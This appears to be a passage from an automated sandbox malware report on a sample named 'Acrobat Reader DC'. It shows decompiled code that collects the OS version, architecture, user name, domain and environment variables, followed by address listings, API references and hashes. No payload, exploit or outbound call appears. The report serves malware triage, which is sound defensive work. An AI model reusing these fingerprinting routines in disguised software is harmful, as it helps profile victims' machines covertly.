															} else {
																__eax = L"WIN_2000";
															}
														} else {
															__eflags =  *((char*)(__eax + 0x30));
															__eax = L"WIN_XPe";
															if(__eflags == 0) {
																__eax = L"WIN_XP";
															}
														}
													} else {
														__eax = L"WIN_2003";
													}
												} else {
													__eax = L"WIN_VISTA";
												}
											} else {
												__eax = L"WIN_2008";
											}
										} else {
											__eax = L"WIN_7";
										}
									} else {
										__eax = L"WIN_2008R2";
									}
								} else {
									__eax = L"WIN_8";
								}
								goto L19;
							case 0x36:
								__eax =  *0x4a9604;
								__edi =  *0x4a9604->wHour;
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x37:
								__edi =  *0x4a9604;
								__edi =  &( *0x4a9604->wSecond);
								__esi = __ebx;
								__eax = E0040E6A0(__ecx,  &( *0x4a9604->wSecond), __ebx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x38:
								__esi =  &_v628;
								__edx = L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language";
								__eax = E0040F250(L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",  &_v628, 0x80000002, L"InstallLanguage", 0x104);
								L17:
								__esp = __esp + 0xc;
								goto L18;
							case 0x39:
								__edx =  *0x4a9604;
								__eax =  *( *0x4a9604 + 0x2e) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									__eax = L"X86";
								} else {
									__eflags = __eax - 6;
									if(__eax == 6) {
										__eax = L"IA64";
									} else {
										__eflags = __eax - 9;
										if(__eax != 9) {
											L99:
											__eax = L"UNKNOWN";
										} else {
											__eax = L"X64";
										}
									}
								}
								goto L19;
							case 0x3a:
								__ecx = 0;
								__eax = 0x80000001;
								asm("cpuid");
								__esi =  &_v68;
								 *__esi = 0x80000001;
								 *(__esi + 4) = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *(__esi + 0xc) = __edx;
								__eflags = _v56 & 0x20000000;
								__eax = L"X64";
								if((_v56 & 0x20000000) == 0) {
									__eax = L"X86";
								}
								__ebx = _a8;
								goto L19;
							case 0x3b:
								__edx =  &_v800;
								__eax = GetKeyboardLayoutNameW( &_v800);
								__eax =  &_v800;
								goto L19;
							case 0x3c:
								 &_v1332 = E00411567( &_v1332, L"3, 3, 8, 1");
								__ecx =  &_v1332;
								__esi = 0;
								__edi = 0;
								__eax = E004111C1( &_v1332);
								__eflags = __eax;
								if(__eax > 0) {
									do {
										__eax =  *(__ebp + __edi * 2 - 0x530) & 0x0000ffff;
										__eflags = __eax - 0x20;
										if(__eax != 0x20) {
											__eflags = __eax - 0x2c;
											if(__eax != 0x2c) {
												 *((short*)(__ebp + __esi * 2 - 0x530)) = __ax;
											} else {
												__edx = 0x2e;
												 *((short*)(__ebp + __esi * 2 - 0x530)) = __dx;
											}
											__esi = __esi + 1;
											__eflags = __esi;
										}
										__eax =  &_v1332;
										__edi =  &(__edi->i);
										__eax = E004111C1( &_v1332);
										__eflags = __edi - __eax;
									} while (__edi < __eax);
								}
								__ecx = 0;
								 *((short*)(__ebp + __esi * 2 - 0x530)) = __cx;
								__eax =  &_v1332;
								goto L19;
							case 0x3d:
								__edx =  &_v628;
								__eax = GetModuleFileNameW(0,  &_v628, 0x104);
								goto L18;
							case 0x3e:
								 &_v100 = E00433493(1,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x3f:
								__ecx =  &_v100;
								__eax = E00433493(2,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x40:
								__edx =  &_v100;
								__eax = E00433493(3,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x41:
								 &_v100 = E00433493(4,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x42:
								E0040E710("\r", _t215, _t217);
								E00402250( &_a12);
								__eflags = 0;
								return 0;
								goto L145;
							case 0x43:
								"\n" = E0040E710("\n", __ebx, __ecx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x44:
								L"\r\n" = E0040E710(L"\r\n", __ebx, __ecx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x45:
								__ecx =  &_v52;
								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
								__edi = _v52.right;
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x46:
								__edx =  &_v52;
								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
								__edi = _v52.bottom;
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x47:
								__edi = GetDesktopWindow();
								__eax = GetDC(__edi);
								_a8 = __eax;
								__eax = GetDeviceCaps(__eax, 0xc);
								__esi = __ebx;
								_v8 = __eax;
								__eax = E00408F40(__edi, __ebx);
								__ecx = _a8;
								__eax = _v8;
								 *((intOrPtr*)(__ebx + 8)) = 1;
								 *__ebx = _v8;
								__eax = ReleaseDC(__edi, _a8);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x48:
								__edi = GetDesktopWindow();
								__eax = GetDC(__edi);
								_a8 = __eax;
								__eax = GetDeviceCaps(__eax, 0x74);
								__esi = __ebx;
								_v8 = __eax;
								E00408F40(__edi, __ebx) = _a8;
								__edx = _v8;
								 *((intOrPtr*)(__ebx + 8)) = 1;
								 *__ebx = _v8;
								__eax = ReleaseDC(__edi, _a8);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x49:
								__eax =  *0x4a7f54;
								__eflags = __eax - 3;
								if(__eax == 3) {
									goto L128;
								} else {
									__eflags = __eax - 4;
									if(__eax != 4) {
										goto L141;
									} else {
										goto L128;
									}
								}
								goto L143;
							case 0x4a:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"COMSPEC", __ecx, 0x104);
								goto L18;
							case 0x4b:
								"\t" = E0040E710("\t", __ebx, __ecx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x4c:
								__eax =  &_a4;
								__ecx =  &_v628;
								_a4 = 0x104;
								__eax = GetUserNameW(__ecx,  &_a4);
								goto L18;
							case 0x4d:
								__edx =  &_v628;
								__eax = GetTempPathW(0x104,  &_v628);
								__esi =  &_v628;
								__eax = E00410290( &_v628, __eflags);
								goto L18;
							case 0x4e:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERPROFILE",  &_v628, 0x104);
								goto L18;
							case 0x4f:
								 &_v628 = GetEnvironmentVariableW(L"HOMEDRIVE",  &_v628, 0x104);
								goto L18;
							case 0x50:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"HOMEPATH", __ecx, 0x104);
								goto L18;
							case 0x51:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"HOMESHARE",  &_v628, 0x104);
								goto L18;
							case 0x52:
								 &_v628 = GetEnvironmentVariableW(L"LOGONSERVER",  &_v628, 0x104);
								goto L18;
							case 0x53:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERDOMAIN", __ecx, 0x104);
								goto L18;
							case 0x54:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERDNSDOMAIN",  &_v628, 0x104);
								goto L18;
							case 0x55:
								goto L144;
							case 0x56:
								__edi =  *(__esi + 0x148);
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								L143:
								 *((intOrPtr*)(__ebx + 8)) = 1;
								goto L144;
							case 0x57:
								__eax =  *(__esi + 0x14c);
								goto L19;
							case 0x58:
								__eax = GetCurrentProcessId();
								_a8 = __eax;
								asm("fild dword [ebp+0xc]");
								__eflags = __eax;
								if(__eax < 0) {
									__fp0 = __fp0 +  *0x48cd18;
								}
								__esi = __ebx;
								_v12 = __fp0;
								__eax = E00408F40(__edi, __ebx);
								__fp0 = _v12;
								__ecx =  &_a12;
								 *__ebx = _v12;
								 *((intOrPtr*)(__ebx + 8)) = 3;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x59:
								__esi =  &_v628;
								__edx = L"Control Panel\\Appearance";
								__eax = E0040F250(L"Control Panel\\Appearance",  &_v628, 0x80000001, L"SchemeLangID", 0x104);
								__eax = _v628 & 0x0000ffff;
								_a4 = _v628 & 0x0000ffff;
								__eax = E00432E88(__eax, 0, __esi, 4);
								L18:
								_t38 =  &_v628; // 0x48bf60
								__eax = _t38;
								L19:
								__eax = E0040E710(__eax, __ebx, __ecx);
								_t39 =  &_a12; // 0x48c1e0
								__ecx = _t39;
								E00402250(_t39) = 0;
								__eflags = 0;
								return 0;
								goto L145;
						}
					}
				} else {
					_t232 =  &_v36;
					E00401B10("@",  &_v36, _t239);
					_a8 = 0;
					E0040BD50(_t232, _t241,  &_a12);
					E0040C2C0(0, _t232,  &_v8,  &_a8);
					_t207 = _v8;
					if(_v8 != 0) {
						E00408E80(_t215, 0, _t207);
						E00402250( &_v36);
						E00402250( &_a12);
						__eflags = 0;
						return 0;
					} else {
						E00402250(_t232);
						E00402250( &_a12);
						return 1;
					}
				}
				L145:
			}









































                                  0x004720db
                                  0x004720e5
                                  0x004720fc
                                  0x00472103
                                  0x0047211a
                                  0x00472121
                                  0x00472129
                                  0x0047212c
                                  0x0047212e
                                  0x0047213b
                                  0x00472147
                                  0x0047214c
                                  0x00472151
                                  0x00000000
                                  0x00000000
                                  0x00472153
                                  0x00472157
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472157
                                  0x00472159
                                  0x0047215c
                                  0x004721d1
                                  0x004721d4
                                  0x00472db4
                                  0x00472db7
                                  0x00472dbe
                                  0x00472dc4
                                  0x004721da
                                  0x004721da
                                  0x00000000
                                  0x00472255
                                  0x00472257
                                  0x0047225a
                                  0x00472263
                                  0x00472266
                                  0x00472268
                                  0x0047226d
                                  0x00000000
                                  0x00000000
                                  0x00472274
                                  0x00472276
                                  0x00472279
                                  0x00472282
                                  0x00472286
                                  0x0047228b
                                  0x00472293
                                  0x00472293
                                  0x0047229b
                                  0x00000000
                                  0x00000000
                                  0x0047229e
                                  0x004722a2
                                  0x004722a8
                                  0x004722ac
                                  0x004722ad
                                  0x004722b2
                                  0x004722b8
                                  0x00000000
                                  0x00000000
                                  0x004722e4
                                  0x004722f2
                                  0x004722fd
                                  0x004722ff
                                  0x00472301
                                  0x00472306
                                  0x0047230c
                                  0x00472311
                                  0x00472319
                                  0x00472319
                                  0x00472321
                                  0x00000000
                                  0x00000000
                                  0x00472329
                                  0x00472329
                                  0x00472330
                                  0x00472337
                                  0x00472342
                                  0x00472344
                                  0x00472346
                                  0x0047234b
                                  0x0047234b
                                  0x00472351
                                  0x00472356
                                  0x00472356
                                  0x0047235e
                                  0x0047235e
                                  0x00472366
                                  0x00000000
                                  0x00000000
                                  0x0047236e
                                  0x0047236e
                                  0x00472375
                                  0x00472375
                                  0x0047237c
                                  0x00472387
                                  0x00472389
                                  0x0047238b
                                  0x00472390
                                  0x00472390
                                  0x00472396
                                  0x0047239b
                                  0x0047239b
                                  0x004723a3
                                  0x004723a3
                                  0x004723ab
                                  0x00000000
                                  0x00000000
                                  0x004723b3
                                  0x004723b3
                                  0x004723ba
                                  0x004723c1
                                  0x004723cc
                                  0x004723ce
                                  0x004723d0
                                  0x004723d5
                                  0x004723d5
                                  0x004723db
                                  0x004723e0
                                  0x004723e0
                                  0x004723e8
                                  0x004723e8
                                  0x004723f0
                                  0x00000000
                                  0x00000000
                                  0x004723f8
                                  0x004723f8
                                  0x004723ff
                                  0x00472406
                                  0x00472411
                                  0x00472413
                                  0x00472415
                                  0x0047241a
                                  0x0047241a
                                  0x00472420
                                  0x00472425
                                  0x00472425
                                  0x0047242d
                                  0x0047242d
                                  0x00472435
                                  0x00000000
                                  0x00000000
                                  0x0047243d
                                  0x0047243d
                                  0x00472444
                                  0x00472444
                                  0x0047244b
                                  0x00472456
                                  0x00472458
                                  0x0047245a
                                  0x0047245f
                                  0x0047245f
                                  0x00472465
                                  0x0047246a
                                  0x0047246a
                                  0x00472472
                                  0x00472472
                                  0x0047247a
                                  0x00000000
                                  0x00000000
                                  0x0047247d
                                  0x0047247d
                                  0x00472484
                                  0x0047248f
                                  0x00472490
                                  0x00472495
                                  0x00472495
                                  0x0047249b
                                  0x004722b9
                                  0x004722b9
                                  0x00000000
                                  0x00000000
                                  0x004724a6
                                  0x004724ae
                                  0x004724b9
                                  0x004724bb
                                  0x004724bd
                                  0x004724c2
                                  0x004724c5
                                  0x004724ca
                                  0x004724d2
                                  0x004724d2
                                  0x004724da
                                  0x00000000
                                  0x00000000
                                  0x004724dd
                                  0x004724dd
                                  0x004724e3
                                  0x004724e4
                                  0x004724e6
                                  0x004724e8
                                  0x004724ea
                                  0x004724ec
                                  0x00000000
                                  0x00000000
                                  0x004724f7
                                  0x004724f7
                                  0x004724fd
                                  0x004724fe
                                  0x00472500
                                  0x00472502
                                  0x00472504
                                  0x00472506
                                  0x00000000
                                  0x00000000
                                  0x00472511
                                  0x00472511
                                  0x00472517
                                  0x00472518
                                  0x0047251a
                                  0x0047251c
                                  0x0047251e
                                  0x00472520
                                  0x00000000
                                  0x00000000
                                  0x0047252b
                                  0x0047252b
                                  0x00472531
                                  0x00472532
                                  0x00472534
                                  0x00472536
                                  0x00472538
                                  0x0047253a
                                  0x00000000
                                  0x00000000
                                  0x00472545
                                  0x00472545
                                  0x0047254b
                                  0x0047254c
                                  0x0047254e
                                  0x00472550
                                  0x00472552
                                  0x00472554
                                  0x00000000
                                  0x00000000
                                  0x0047255f
                                  0x0047255f
                                  0x00472565
                                  0x00472566
                                  0x00472568
                                  0x0047256a
                                  0x0047256c
                                  0x0047256e
                                  0x00000000
                                  0x00000000
                                  0x00472579
                                  0x00472579
                                  0x0047257f
                                  0x00472580
                                  0x00472582
                                  0x00472584
                                  0x00472586
                                  0x00472588
                                  0x00000000
                                  0x00000000
                                  0x00472593
                                  0x00472593
                                  0x00472599
                                  0x0047259a
                                  0x0047259c
                                  0x0047259e
                                  0x004725a0
                                  0x004725a2
                                  0x00000000
                                  0x00000000
                                  0x004725ad
                                  0x004725ad
                                  0x004725b3
                                  0x004725b4
                                  0x004725b6
                                  0x004725b8
                                  0x004725ba
                                  0x004725bc
                                  0x00000000
                                  0x00000000
                                  0x004725c7
                                  0x004725cd
                                  0x004725ce
                                  0x004725d0
                                  0x004725d2
                                  0x004725d4
                                  0x004725d6
                                  0x00000000
                                  0x00000000
                                  0x004725e1
                                  0x004725e7
                                  0x004725e8
                                  0x004725ea
                                  0x004725ec
                                  0x004725ee
                                  0x004725f0
                                  0x00000000
                                  0x00000000
                                  0x004725fb
                                  0x00472601
                                  0x00472602
                                  0x00472604
                                  0x00472606
                                  0x00472608
                                  0x0047260a
                                  0x00000000
                                  0x00000000
                                  0x00472615
                                  0x0047261b
                                  0x0047261c
                                  0x0047261e
                                  0x00472620
                                  0x00472622
                                  0x00472624
                                  0x00000000
                                  0x00000000
                                  0x0047262f
                                  0x00472635
                                  0x00472636
                                  0x00472638
                                  0x0047263a
                                  0x0047263c
                                  0x0047263e
                                  0x00000000
                                  0x00000000
                                  0x00472649
                                  0x0047264f
                                  0x00472650
                                  0x00472652
                                  0x00472654
                                  0x00472656
                                  0x00472658
                                  0x00000000
                                  0x00000000
                                  0x00472663
                                  0x00472669
                                  0x0047266a
                                  0x0047266c
                                  0x0047266e
                                  0x00472670
                                  0x00472672
                                  0x00000000
                                  0x00000000
                                  0x0047267d
                                  0x00472681
                                  0x00472688
                                  0x0047268f
                                  0x00000000
                                  0x00000000
                                  0x0047269f
                                  0x004726a6
                                  0x004726ac
                                  0x004726ae
                                  0x00000000
                                  0x004726b4
                                  0x00000000
                                  0x004726b4
                                  0x00000000
                                  0x00000000
                                  0x004726b9
                                  0x004726bf
                                  0x004726c3
                                  0x004726c8
                                  0x004726ce
                                  0x004726cf
                                  0x004726f2
                                  0x004726d1
                                  0x004726d1
                                  0x004726d3
                                  0x004726d6
                                  0x004726d9
                                  0x004726e2
                                  0x004726e4
                                  0x004726e8
                                  0x004726e8
                                  0x00000000
                                  0x00000000
                                  0x00472da0
                                  0x00472da0
                                  0x00000000
                                  0x00000000
                                  0x004726fd
                                  0x004726ff
                                  0x00472704
                                  0x00000000
                                  0x00000000
                                  0x0047270f
                                  0x00472711
                                  0x00472716
                                  0x00000000
                                  0x00000000
                                  0x00472721
                                  0x00472723
                                  0x00472728
                                  0x00000000
                                  0x00000000
                                  0x00472733
                                  0x00472735
                                  0x0047273a
                                  0x00000000
                                  0x00000000
                                  0x00472745
                                  0x00472747
                                  0x0047274c
                                  0x00000000
                                  0x00000000
                                  0x004727c7
                                  0x004727c9
                                  0x004727ce
                                  0x00000000
                                  0x00000000
                                  0x004727d9
                                  0x004727db
                                  0x004727e0
                                  0x00000000
                                  0x00000000
                                  0x00472757
                                  0x00472759
                                  0x0047275e
                                  0x00000000
                                  0x00000000
                                  0x00472769
                                  0x0047276b
                                  0x00472770
                                  0x00000000
                                  0x00000000
                                  0x0047277b
                                  0x0047277d
                                  0x00472782
                                  0x00000000
                                  0x00000000
                                  0x0047278d
                                  0x0047278f
                                  0x00472794
                                  0x00000000
                                  0x00000000
                                  0x00472c6f
                                  0x00472c6f
                                  0x00472c71
                                  0x00472c76
                                  0x00000000
                                  0x00000000
                                  0x004727eb
                                  0x004727ed
                                  0x004727f2
                                  0x00000000
                                  0x00000000
                                  0x004727fd
                                  0x004727ff
                                  0x00472804
                                  0x00000000
                                  0x00000000
                                  0x0047279f
                                  0x00000000
                                  0x00000000
                                  0x004727be
                                  0x004727a6
                                  0x004727a6
                                  0x004727a8
                                  0x00472da2
                                  0x00472da2
                                  0x00472da7
                                  0x004727ae
                                  0x004727ae
                                  0x004727b3
                                  0x004727b3
                                  0x00000000
                                  0x00000000
                                  0x0047280f
                                  0x00000000
                                  0x00000000
                                  0x0047281a
                                  0x00000000
                                  0x00000000
                                  0x00472825
                                  0x00000000
                                  0x00000000
                                  0x00472830
                                  0x00472837
                                  0x0047283c
                                  0x0047283e
                                  0x00472840
                                  0x00472845
                                  0x00000000
                                  0x00000000
                                  0x0047284c
                                  0x00472858
                                  0x00000000
                                  0x00000000
                                  0x004728cf
                                  0x00000000
                                  0x00000000
                                  0x004728d9
                                  0x004728de
                                  0x004728e2
                                  0x004728ee
                                  0x004728f2
                                  0x004728fe
                                  0x00472902
                                  0x0047290e
                                  0x00472912
                                  0x0047291e
                                  0x00472922
                                  0x0047292e
                                  0x00472932
                                  0x0047293e
                                  0x00472942
                                  0x0047295d
                                  0x00472961
                                  0x00000000
                                  0x00472963
                                  0x00472963
                                  0x00472963
                                  0x00472944
                                  0x00472944
                                  0x00472948
                                  0x0047294d
                                  0x00472953
                                  0x00472953
                                  0x0047294d
                                  0x00472934
                                  0x00472934
                                  0x00472934
                                  0x00472924
                                  0x00472924
                                  0x00472924
                                  0x00472914
                                  0x00472914
                                  0x00472914
                                  0x00472904
                                  0x00472904
                                  0x00472904
                                  0x004728f4
                                  0x004728f4
                                  0x004728f4
                                  0x004728e4
                                  0x004728e4
                                  0x004728e4
                                  0x00000000
                                  0x00000000
                                  0x00472977
                                  0x0047297c
                                  0x0047297f
                                  0x00472981
                                  0x00472986
                                  0x00000000
                                  0x00000000
                                  0x0047298d
                                  0x00472993
                                  0x00472996
                                  0x00472998
                                  0x0047299d
                                  0x004729a5
                                  0x004729a5
                                  0x004729ad
                                  0x00000000
                                  0x00000000
                                  0x004729bf
                                  0x004729c5
                                  0x004729ca
                                  0x004722be
                                  0x004722be
                                  0x00000000
                                  0x00000000
                                  0x00472863
                                  0x00472869
                                  0x0047286d
                                  0x0047286f
                                  0x00472893
                                  0x00472871
                                  0x00472871
                                  0x00472874
                                  0x00472889
                                  0x00472876
                                  0x00472876
                                  0x00472879
                                  0x0047296d
                                  0x0047296d
                                  0x0047287f
                                  0x0047287f
                                  0x0047287f
                                  0x00472879
                                  0x00472874
                                  0x00000000
                                  0x00000000
                                  0x0047289d
                                  0x0047289f
                                  0x004728a4
                                  0x004728a6
                                  0x004728a9
                                  0x004728ab
                                  0x004728ae
                                  0x004728b1
                                  0x004728b4
                                  0x004728bb
                                  0x004728c0
                                  0x004728c2
                                  0x004728c2
                                  0x004728c7
                                  0x00000000
                                  0x00000000
                                  0x00472a13
                                  0x00472a1a
                                  0x00472a20
                                  0x00000000
                                  0x00000000
                                  0x00472a37
                                  0x00472a3c
                                  0x00472a43
                                  0x00472a45
                                  0x00472a47
                                  0x00472a4f
                                  0x00472a51
                                  0x00472a5b
                                  0x00472a5b
                                  0x00472a63
                                  0x00472a66
                                  0x00472a68
                                  0x00472a6b
                                  0x00472a7c
                                  0x00472a6d
                                  0x00472a6d
                                  0x00472a72
                                  0x00472a72
                                  0x00472a84
                                  0x00472a84
                                  0x00472a84
                                  0x00472a85
                                  0x00472a8c
                                  0x00472a8d
                                  0x00472a95
                                  0x00472a95
                                  0x00472a5b
                                  0x00472a99
                                  0x00472a9b
                                  0x00472aa3
                                  0x00000000
                                  0x00000000
                                  0x00472ab3
                                  0x00472abc
                                  0x00000000
                                  0x00000000
                                  0x00472acd
                                  0x00472ad5
                                  0x00000000
                                  0x00000000
                                  0x00472add
                                  0x00472ae3
                                  0x00472aeb
                                  0x00000000
                                  0x00000000
                                  0x00472af3
                                  0x00472af9
                                  0x00472b01
                                  0x00000000
                                  0x00000000
                                  0x00472b0f
                                  0x00472b17
                                  0x00000000
                                  0x00000000
                                  0x004721e6
                                  0x004721ee
                                  0x004721f3
                                  0x004721fb
                                  0x00000000
                                  0x00000000
                                  0x00472203
                                  0x00472208
                                  0x00472210
                                  0x00472210
                                  0x00472218
                                  0x00000000
                                  0x00000000
                                  0x00472220
                                  0x00472225
                                  0x0047222d
                                  0x0047222d
                                  0x00472235
                                  0x00000000
                                  0x00000000
                                  0x00472b1f
                                  0x00472b2a
                                  0x00472b30
                                  0x00472b33
                                  0x00472b35
                                  0x00472b3a
                                  0x00000000
                                  0x00000000
                                  0x00472b41
                                  0x00472b4c
                                  0x00472b52
                                  0x00472b55
                                  0x00472b57
                                  0x00472b5c
                                  0x00000000
                                  0x00000000
                                  0x00472b69
                                  0x00472b6c
                                  0x00472b75
                                  0x00472b78
                                  0x00472b7e
                                  0x00472b80
                                  0x00472b83
                                  0x00472b88
                                  0x00472b8b
                                  0x00472b90
                                  0x00472b97
                                  0x00472b99
                                  0x00472b9f
                                  0x00472ba7
                                  0x00472ba7
                                  0x00472baf
                                  0x00000000
                                  0x00000000
                                  0x00472bb8
                                  0x00472bbb
                                  0x00472bc4
                                  0x00472bc7
                                  0x00472bcd
                                  0x00472bcf
                                  0x00472bd7
                                  0x00472bda
                                  0x00472bdf
                                  0x00472be6
                                  0x00472be8
                                  0x00472bee
                                  0x00472bf6
                                  0x00472bf6
                                  0x00472bfe
                                  0x00000000
                                  0x00000000
                                  0x00472c5c
                                  0x00472c61
                                  0x00472c64
                                  0x00000000
                                  0x00472c66
                                  0x00472c66
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00472c06
                                  0x00472c12
                                  0x00000000
                                  0x00000000
                                  0x0047223d
                                  0x00472242
                                  0x0047224a
                                  0x0047224a
                                  0x00472252
                                  0x00000000
                                  0x00000000
                                  0x00472c3f
                                  0x00472c43
                                  0x00472c4a
                                  0x00472c51
                                  0x00000000
                                  0x00000000
                                  0x00472c1d
                                  0x00472c29
                                  0x00472c2f
                                  0x00472c35
                                  0x00000000
                                  0x00000000
                                  0x00472c86
                                  0x00472c92
                                  0x00000000
                                  0x00000000
                                  0x00472cae
                                  0x00000000
                                  0x00000000
                                  0x00472cbe
                                  0x00472cca
                                  0x00000000
                                  0x00000000
                                  0x00472cda
                                  0x00472ce6
                                  0x00000000
                                  0x00000000
                                  0x00472d02
                                  0x00000000
                                  0x00000000
                                  0x00472d12
                                  0x00472d1e
                                  0x00000000
                                  0x00000000
                                  0x00472d2e
                                  0x00472d3a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472d45
                                  0x00472d4b
                                  0x00472d4d
                                  0x00472d52
                                  0x00472dad
                                  0x00472dad
                                  0x00000000
                                  0x00000000
                                  0x00472d56
                                  0x00000000
                                  0x00000000
                                  0x00472d61
                                  0x00472d67
                                  0x00472d6a
                                  0x00472d6d
                                  0x00472d6f
                                  0x00472d71
                                  0x00472d71
                                  0x00472d77
                                  0x00472d79
                                  0x00472d7c
                                  0x00472d81
                                  0x00472d84
                                  0x00472d87
                                  0x00472d89
                                  0x00472d95
                                  0x00472d95
                                  0x00472d9d
                                  0x00000000
                                  0x00000000
                                  0x004729e3
                                  0x004729e9
                                  0x004729ee
                                  0x004729f3
                                  0x00472a03
                                  0x00472a06
                                  0x004722c1
                                  0x004722c1
                                  0x004722c1
                                  0x004722c7
                                  0x004722c7
                                  0x004722cc
                                  0x004722cc
                                  0x004722d4
                                  0x004722d4
                                  0x004722dc
                                  0x00000000
                                  0x00000000
                                  0x004721da
                                  0x0047215e
                                  0x00472163
                                  0x00472166
                                  0x00472171
                                  0x00472178
                                  0x00472187
                                  0x0047218c
                                  0x00472191
                                  0x004721b1
                                  0x004721b9
                                  0x004721c1
                                  0x004721c6
                                  0x004721ce
                                  0x00472193
                                  0x00472195
                                  0x0047219d
                                  0x004721ad
                                  0x004721ad
                                  0x00472191
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 00472103
                                  • _memset.LIBCMT ref: 00472121
                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                  • __swprintf.LIBCMT ref: 004722B9
                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FolderPath$_memset$LocalTime__swprintf
                                  • String ID: %.3d
                                  • API String ID: 645292623-986655627
                                  • Opcode ID: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                  • Opcode Fuzzy Hash: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00468B0E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 207windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00468B0E(void* __fp0, struct tagMENUITEMINFOW** _a4, struct HWND__* _a8, intOrPtr _a12) {
				struct HMENU__* _v12;
				struct tagPOINT _v20;
				struct tagMENUITEMINFOW _v68;
				signed int _t51;
				signed int _t85;
				struct HWND__* _t87;
				struct HMENU__** _t88;
				void* _t99;

				_t99 = __fp0;
				_t88 = _a4;
				_v68.cbSize = 0x30;
				E00412F40( &(_v68.fMask), 0, 0x2c);
				_t51 = _a12 + 0xfffffe00;
				_t85 = 0;
				_v12 = _t88[0x274];
				if(_t51 > 6) {
					L20:
					if((_t88[3] & _t85) == 0 ||  *0x4974eb == 0) {
						L34:
						return _t51;
					} else {
						if(_t88[1] == 0) {
							DeleteMenu( *_t88, 5, 0);
							DeleteMenu( *_t88, 4, 0);
							DeleteMenu( *_t88, 6, 0);
							DeleteMenu( *_t88, 3, 0);
							_t88[2] = 0;
						} else {
							if(_t88[2] == 0) {
								if(GetMenuItemCount( *_t88) > 0) {
									_t88[0x274] = 4;
